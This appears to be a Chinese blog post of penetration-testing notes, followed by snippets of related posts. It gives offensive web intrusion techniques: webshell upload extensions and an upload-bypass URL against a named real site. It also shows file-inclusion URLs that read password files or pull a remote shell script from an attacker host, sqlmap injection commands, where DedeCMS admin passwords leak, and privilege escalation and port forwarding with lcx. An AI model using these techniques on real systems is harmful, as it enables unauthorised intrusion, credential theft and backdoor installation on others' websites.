2016.5.19渗透经验总结

PHP下防跨站用PHP自带的strip_tags()和htmlspecialchars()可以对用户提交的

html和PHP进行转换,对UPDATE和INSERT中的变量用以上两个函数转换

如果PHP假设在win上那么就可以解析cer,asa,aspx,asax,aspx,cdx格式的文件

而在Linux,Unix上则可以解析pl,PHP3,格式的文件(pl:perl语言)

PHP2,PHP,Inc,pwml,asa,cer利用上传webshell

如果PHP使用了文件包含的方法则用 www.xxx.com/index.php?page=./admin.php
就可以读取当前路径下admin.php文件的内容了,也可以用../跳转到其他目录去查看其

它文件 Linux下如果路径对则可以读出密码文件若不对可以用../不断探测
Linux主机下 www.xxx.com/index.php?page=http://www.hack.com/shell.txt?shell=ls

-a 可以遍历当前目录下的所有文件,win下提交www.xxx.com/index.php?

page=http://www.hack.com/shell.txt?shell=dir 同样遍历文件

sqlmap的post注入新学到的方法:在网站中找到表单提交的地方,填写信息提交,抓

包,抓到的包存在txt文件中,运行sqlmap,sqlmap.py -r 文件路径
sqlmap,sqlmap.py -r 文件路径 --current-db 读取当前数据库

织梦cms 配置文件地址 data/admin/ 下,其中的ver.txt 存放的是系统的版本时间

,系统文件时间,找到相应版本的日志文件地址。里面可以爆出管理员密码,找到后台

即可登录。

时间: 2024-10-06 10:51:32

2016.5.19渗透经验总结的相关文章

2016.5.15渗透经验总结

昨天太晚了没来得及写,今天连上昨天的一块写上. 检查所有客户端代码,如HTML及JS代码,寻找任何隐藏了服务器端的线索,以及隐藏的 表单元素等.认证检查注释内容,往往能带给我们惊喜,如部分通用程序会在网站首页放置 一个通向网站管理后台的链接,但网站管理人员不希望这个链接被正常访问者所得知,于 是将内容注释,我们可以通过查看HTML代码得知此具体地址,还有大多数的管理后台中所 调用的JS 中常常会存储着后台所有功能模块的链接地址,但在判断了当前用户权限后将 其隐藏起来,我们也可以通过直接查看JS代

2016.5.5渗透经验总结

今天又看了一个渗透51cto的案例,不过是去年发的,漏洞应该已经没有了.作者也 是碰巧本来是渗透其他网站的,没想到目标站和51cto同服.作者先是去谷歌上搜索 inurl:robots.txt phpcms 找到一个网站以后就开始入侵,作者在目标站上注册了用户 ,本来想上传头像倒是没找到上传的地方,于是就顺手在地址后加上了/index.php? m=member&c=index&a=account_manage_avatar&t=1  (phpcms默认上传图片的地方), 出现上传

2016.5.14渗透经验总结

今天又看了一个渗透案例,拿到网站作者先扫了一下,没有发现可利用的地方,后来在网站上找到了一个用户注册的地方可以上传头像而且存在上传漏洞,但是只允许上传图片格式的,所以作者打开了firebug在其中找到上传格式验证的地方加上了一个asp:jpg再上传时上传成功c:\RECYCLER 巴西烤肉提权    exp地址 "cmd命令"    渗透内网服务器用端口转发 技术,(之前就学过,这段时间一直没机会用就忘了.)用lcx.exe  本机上运行 lcx.exe -listen 51 3389

2016.5.4渗透经验总结

今天看了一个利用上传点通过上传有一句话木马的图片来拿网站webshell的案例.先是找到网站的上传点,http://www.1gouwang.net/taob/admin/upload.asp  在这个网 页上发现上传图片时提示上传失败,这个时候可以在url后加上  ? fuptype=db&fupname=9743727.asp;&frmname=9743727.asp  再次上传图片是就会发现图 片成功上传,之后直接用菜刀链接就可以. 文件名用随便的数字就可以.. IPC$ 是共享命名

Murano Weekly Meeting 2016.07.19

Meeting time: 2016.July.19 1:00~2:00 Chairperson:  Kirill Zaitsev, from Mirantis Meeting summary: 1.Backports Link:  https://etherpad.openstack.org/p/murano-stable-backports/ 2.Convergence so both of our CI servers are running heat with convergence n

2016.1.19 DEV Express控件GirdControl使用

DEV控件在工具箱中消失处理方法 开始-->程序-->Developer Express v2009 vol 3(依据版本不同)-->Components-->Tools-->ToolboxCreator   1.点击一行选择完整一行 Run Designer->View->OptionsBehavior->EditorShowMode 设置为:Click Run Designer->View->OptionsSelection.EnableAp

翻译:Gregory Larsen,2016/02/19(第一版:2014年12月17日)高级T-SQL阶梯1级:使用CROSS JOIN介绍高级T-SQL

原文链接:http://www.sqlservercentral.com/articles/Stairway+Series/119933/ 原文作者:Gregory Larsen,2016/02/19(第一版:2014年12月17日) 系列 本文是"Stairway Series:Stairway to Advanced T-SQL"的一部分 这个阶梯将包含一系列文章,这些文章将在前面两个T-SQL阶梯,T-SQL DML和T-SQL超越基础知识的T-SQL基础上进行扩展. 这个楼梯应

2016.8.19

2016年8月19日.在杭州整整两个月.最近新添加了几个前端群.有一个群感觉特别的靠谱.很多分享.很多技术.给我的感觉有种干海绵碰到了大量的水.可能是做技术的对技术方面的渴求的这种感觉.老实说.之前对自己的技术是真的自信到不行.但是慢慢的,一些经历和经验.让自己对自己的判断越来越不像之前的那种浮夸感了.毕竟自己的经验还不够充足.资历就摆在这里.今天想到一句话.坐井观天,焉知是天? 勉励一下自己.希望能够不断前进.在努力和学习中不断攀高. 最后送一句:人生之所以迷茫,是因为我们的才华配不上我们的梦

各种提权、渗透经验技巧总结大全

旁站路径问题: 1.读网站配置. 2.用以下VBS: On Error Resume Next If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo” WScript